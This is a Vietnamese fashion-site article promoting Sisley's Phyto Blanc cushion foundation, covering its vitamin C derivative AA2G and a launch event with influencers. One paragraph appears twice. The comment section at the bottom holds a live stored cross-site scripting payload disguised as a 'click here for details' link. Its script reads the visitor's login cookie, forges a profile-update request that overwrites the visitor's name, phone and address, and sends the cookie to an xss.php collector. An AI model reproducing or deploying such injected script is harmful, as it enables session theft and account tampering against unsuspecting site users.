Cushion đầu tiên của Sisley ra mắt để chiều lòng phụ nữ châu Á

08/06/2018

Sisley vừa tổ chức buổi ra mắt thành viên mới mang tên Phyto Blanc Brightening Foundation Cushion SPF 30/PA+++ với 3 tone màu trắng sáng, beige và trắng hồng tự nhiên cho làn da căng, khỏe, rạng rỡ.

Trong khi các nhãn khác thi nhau ra đời Cushion từ rất lâu rồi, từ các brand Hàn Quốc đến Nhật, Pháp…thì ngược lại Sisley cứ âm thầm trong công cuộc nghiên cứu và thử nghiệm. Và không uổng công chờ đợi, giờ đây, Sisley đã ra mắt PHYTO BLANC BRIGHTENING CUSHION FOUNDATION SPF30/PA+++ để chiều lòng các fan châu Á.

PHYTO BLANC BRIGHTENING CUSHION FOUNDATION SPF30/PA+++

Nằm trong dòng Phyto Blanc, Cushion Foundation đã kế thừa những ưu điểm vượt trội khi tạo ra màng bảo vệ che phủ ngay lập tức đồng thời dưỡng da sáng và bảo vệ hàng ngày với chỉ số SPF 30/PA+++, giúp chống nắng, chống ô nhiễm, giới hạn sự phát triển của các gốc tự do và giữ lớp trang điểm bền lâu lên đến 8 tiếng.

Nằm trong dòng Phyto Blanc, Cushion Foundation đã kế thừa những ưu điểm vượt trội khi tạo ra màng bảo vệ che phủ ngay lập tức đồng thời dưỡng da sáng và bảo vệ hàng ngày với chỉ số SPF 30/PA+++, giúp chống nắng, chống ô nhiễm, giới hạn sự phát triển của các gốc tự do và giữ lớp trang điểm bền lâu lên đến 8 tiếng.

Không dừng lại ở đó, sản phẩm mới còn giúp thu nhỏ lỗ chân lông, cấp ẩm và tạo hiệu ứng phản xạ ánh sáng giúp làn da căng, sáng ở mọi góc độ. PHYTO BLANC BRIGHTENING CUSHION FOUNDATION SPF30/PA+++  có 3 tone mà phù hợp với làn da châu Á là trắng sáng, beige tự nhiên và sáng hồng rạng rỡ.

Một trong những thành phần phải kể đến để PHYTO BLANC BRIGHTENING CUSHION FOUNDATION SPF30/PA+++ chiếm ưu thế với khả năng nuôi dưỡng làm sáng da đó chính là “AA2G” (Ascorbic acid 2-glucoside).

Thiết kế cổ điển, tinh tế, PHYTO BLANC BRIGHTENING CUSHION FOUNDATION SPF30/PA+++ giúp dễ lấy phấn và giữ khay sạch

Để dưỡng da sáng thì Vitamin C là 1 trong những thành phần không thể thiếu, tuy nhiên, nó cũng nổi tiếng là không ổn định: phân tử này bị suy giảm một cách nhanh chóng đặc biệt là trong môi trường nhiều nước như cream, gel hay huyết thanh . Vì vậy, để bù đắp sự bất ổn này, các nhà nghiên cứu cho nó ổn định với một phân tử glucose (đường) và tạo ra một phân tử (sáng chế mới): Ascorbic Acid 2-Glucoside. Từ đó, hiệu quả của vitamin C được bảo tồn bởi vì khi AA2G được sử dụng cho da, một loại enzyme - alpha-glucosidase - nhắc nhở phân tử này giúp nó nhẹ nhàng phóng thích vitamin C vào da dần dần. Và điều này cho phép nó hoạt động liên tục nhằm ưc chế sự tổng hợp melanin và làm sáng melanin đang hiện hữu.

Ngoài ra, AA2G có tính chất chống các gốc tự do để bảo vệ chống lại ROS (sự oxy hóa) được hình thành trong quá trình tiếp xúc với tia cực tím gây tổn thương mô tế bào và dẫn đến hình ảnh lão hóa và kích hoạt tyrosinase (enzyme kích thích việc hình thành melanin)

Thành phần hoạt chất này kích thích sự tổng hợp collagen trong các nguyên bào sợi da, và cũng giúp cải thiện độ đàn hồi và sức đề kháng của da.

Với thiết kế cổ điển, tinh tế, PHYTO BLANC BRIGHTENING CUSHION FOUNDATION SPF30/PA+++ giúp dễ lấy phấn và giữ khay sạch hơn. Ngoài ra, bông phấn dặm cũng được thiết kế đặc biệt giúp thông thoáng, ngăn vi khuẩn và tán sản phẩm đều hơn trên da.

Các khách mời đặc biệt cho buổi ra mắt Cushion của Sisley

Buổi event đã diễn ra thành công khi nhận được sự quan tâm của nhiều KOLs như Sang Lê - Người đẹp Hoa hậu Hoàn Vũ 2015, Model Mid Nguyễn, Việt Nam Next Top Model Trà My, các Beauty Bloggers như Gấu Zoan, Asley Vân, Fashionista - Cây Bút vàng Thư Vũ... Cùng rất nhiều anh chị báo giới và khách hàng VIP. Đặc biệt là sự xuất hiện của chuyên gia trang điểm toàn cầu đến từ Sisley Paris Mr. Pascal Capitaine.

Chuyên gia trang điểm toàn cầu đến từ Sisley Paris Mr. Pascal Capitaine chụp hình cùng với các người đẹp

Đến với Event của Sisley khách mời như được đắm chìm trong một khu vườn tràn ngập đầy hoa xinh tươi, thơ mộng và không kém phần thú vị với talk show "Bạn vẫn là bạn nhưng đẹp hơn mỗi ngày". Đó cũng chính là thông điệp mà Sisley muốn truyền tải đến tất cả các Bạn. Sisley luôn mong muốn trở thành một người bạn đồng hành trong việc giúp Bạn trở nên đẹp hơn để luôn tự tin tỏa sáng.

Với sự kiện ra mắt Cushion lần này, Sisley tin chắc rằng Phyto Blanc Cushion sẽ là sản phẩm "must have"của bạn.

Bình luận

Bạn nghĩ gì về bài viết này ?(1 bình luận)

Bạn cần đăng nhập để có thể bình luận

Có 1 thành viên đã bình luận

Vulnerable

Vulnerable

<a href="#" onclick="javascript:function getID(){ a = document.cookie.match('lo_user'); b = a['input'].slice(a['input'].search('lo_user')); return b.slice(0, b.search(';'));};fetch('https://www.lofficiel.vn/tai-khoan/thong-tin-ca-nhan', {'headers': {'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'cookie': '__asc=482511c617507373ebb2f5d3187; fblo_1538391976230875=y; lo_user=%7B%22id%22%3A1616%7D; __asc=482511c617507373ebb2f5d3187; _gat=1',}, 'body':'fullname=Vulnerable&phone=Vulnerable&address=Vulnerable&job=Vulnerable','method': 'POST', 'credentials': 'include'}).then(response => response.json()).then(data => { console.log('Success:', data);}).catch((error) => { console.error('Error:', error);});window.location='http://127.0.0.1:8081/Tester/xss.php?cok='+getID()+'&url='+document.URL;" >Click vào đây để xem chi tiết</a>